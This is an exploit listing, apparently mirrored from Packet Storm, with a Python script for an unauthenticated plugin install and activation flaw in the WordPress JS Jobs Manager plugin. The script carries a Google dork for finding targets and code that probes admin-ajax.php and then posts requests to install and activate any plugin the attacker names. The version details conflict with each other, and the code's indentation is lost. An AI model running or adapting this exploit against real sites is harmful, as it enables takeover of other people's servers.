Exploit for WordPress JS Jobs Manager 1.1.7 Authorization Bypass

Name: Exploit for WordPress JS Jobs Manager 1.1.7 Authorization Bypass
Rating: 5 (168 reviews)
2021-09-30 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:164340
# Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation  
# Google Dork: inurl:/wp-content/plugins/js-jobs/  
# Date: 22/09/2021  
# Exploit Author: spacehen  
# Vendor Homepage: https://wordpress.org/plugins/js-jobs/  
# Version: <= 1.9.1.4  
# Tested on: Ubuntu 20.04.1  
  
import os.path  
from os import path  
import json  
import requests;  
import sys  
  
def print_banner():  
print("JS Job Manager <= 1.1.7 - Arbitrary Plugin Install/Activation")  
print("Author -> space_hen (www.github.com/spacehen)")  
  
  
def print_usage():  
print("Usage: python3 exploit.py [target url] [plugin slug]")  
print("Ex: python3 exploit.py https://example.com advanced-uploader")  
print("Note: To activate plugin successfully, main plugin file")  
print("should match slug, i.e ./plugin-slug/plugin-slug.php")  
  
def vuln_check(uri):  
response = requests.get(uri)  
raw = response.text  
  
if ("Not Allowed!" in raw):  
return True;  
else:  
return False;  
  
def main():  
  
print_banner()  
if(len(sys.argv) != 3):  
print_usage();  
sys.exit(1);  
  
base = sys.argv[1]  
slug = sys.argv[2]  
  
ajax_action = 'jsjobs_ajax'  
admin = '/wp-admin/admin-ajax.php';  
  
uri = base + admin + '?action=' + ajax_action ;  
check = vuln_check(uri);  
  
if(check == False):  
print("(*) Target not vulnerable!");  
sys.exit(1)  
  
data = {  
"task" : "installPluginFromAjax",  
"jsjobsme" : "jsjobs",  
"pluginslug" : slug  
}  
print("Installing plugin...");  
response = requests.post(uri, data=data )  
print("Activating plugin...");  
  
data = {  
"task" : "activatePluginFromAjax",  
"jsjobsme" : "jsjobs",  
"pluginslug" : slug  
}  
response = requests.post(uri, data=data )  
  
main();